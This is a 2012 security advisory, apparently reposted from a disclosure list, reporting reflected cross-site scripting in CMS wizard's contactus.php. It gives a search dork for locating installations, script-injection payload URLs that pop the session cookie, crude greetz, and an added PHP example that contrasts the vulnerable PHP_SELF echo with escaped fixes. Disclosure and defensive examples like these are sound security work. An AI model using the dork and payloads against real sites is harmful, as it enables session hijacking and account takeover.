Information Security


Additional information

  Summary of security vulnerabilities in Web applications (PHP, ASP, JSP, CGI, Perl)

  Multiple vulnerabilities in 11in1

  Multiple vulnerabilities in LEPTON

  SEC Consult SA-20120220-0 :: Multiple critical vulnerabilities in VOXTRONIC voxlog professional

  SQL Injection Vulnerabilities in TestLink

From: mr xadal <xadalz_(at)_gmail.com>
Date: 22 February 2012
Subject: CMS wizard Cross Site Scripting

=================================================================
-=CMS wizard Cross Site Scripting
=================================================================

##########################################################
## Author: XaDaL
## Date: 14-02-2012
## vendor: http://www.cmswizard.co.uk/
## tested on: windows mobile
## dork : powered by CMS wizard
##########################################################

This vulnerability affects /contactus.php.

##The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating
the user. It is also possible to modify the content of the page presented to the user.

##Attack details
URI was set to "><script>alert(document.cookie)</script>

or

              "><script>alert(/XaDaL_GantenG/)</script>


or other

##=XSS=

http://localhost/contactus.php/"><script>alert(document.cookie)</script>

http://localhost/contactus.php/"><script>alert(/XaDaL_GantenG/)</script>


!#GREETZ:
kamtiez , 1bli3z , tukulesto , hakz , jundab ,boebefa ,ryan aby , albert wired ,dr.CruzZ
xr0b0t , red r0b0t,El-Farhatz,s1do3l,virgi maho. and everyone else I can't mention one by one (o,0)v


all member magelangcyber , indonesiancoder , codenesia,kill-9,MC-crew.

and aya i love you full :*

#Bogel & dicka cyber: let's get coffee together again sometime, bro =))

# Happy fvcklentine...
umbar-umbar titit hhhhhhhhhh :p
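
An added example, not part of the original advisory and not CMS wizard code: a common cause of script injection through path data appended after a script name, as in the URLs above, is echoing `$_SERVER['PHP_SELF']` into markup without escaping. That contactus.php does this is an assumption; the function names and request values below are constructed for illustration.

```php
<?php
// Added example, not CMS wizard code. Assumption: the page echoes
// $_SERVER['PHP_SELF'] (script name plus client-supplied PATH_INFO)
// into a form action attribute.

// Vulnerable pattern: trailing path data lands in the attribute unescaped.
function form_action_vulnerable(array $server): string
{
    return '<form method="post" action="' . $server['PHP_SELF'] . '">';
}

// Hardened pattern: use SCRIPT_NAME (which excludes PATH_INFO) and still
// escape for an HTML attribute context.
function form_action_hardened(array $server): string
{
    $action = htmlspecialchars(
        $server['SCRIPT_NAME'],
        ENT_QUOTES | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return '<form method="post" action="' . $action . '">';
}

// Defence in depth: a script that never expects trailing path data can
// refuse such requests outright (for example with a 404).
function has_unexpected_path_info(array $server): bool
{
    return isset($server['PATH_INFO']) && $server['PATH_INFO'] !== '';
}

// Constructed request values matching the URL form shown in the advisory.
$server = [
    'SCRIPT_NAME' => '/contactus.php',
    'PATH_INFO'   => '/"><script>alert(document.cookie)</script>',
    'PHP_SELF'    => '/contactus.php/"><script>alert(document.cookie)</script>',
];

echo form_action_vulnerable($server), PHP_EOL; // attribute is broken out of
echo form_action_hardened($server), PHP_EOL;   // action="/contactus.php"
echo has_unexpected_path_info($server) ? "reject request\n" : "ok\n";
```

Marking the session cookie `HttpOnly` limits the cookie-theft impact the advisory describes, but it does not remove the injection itself.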

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod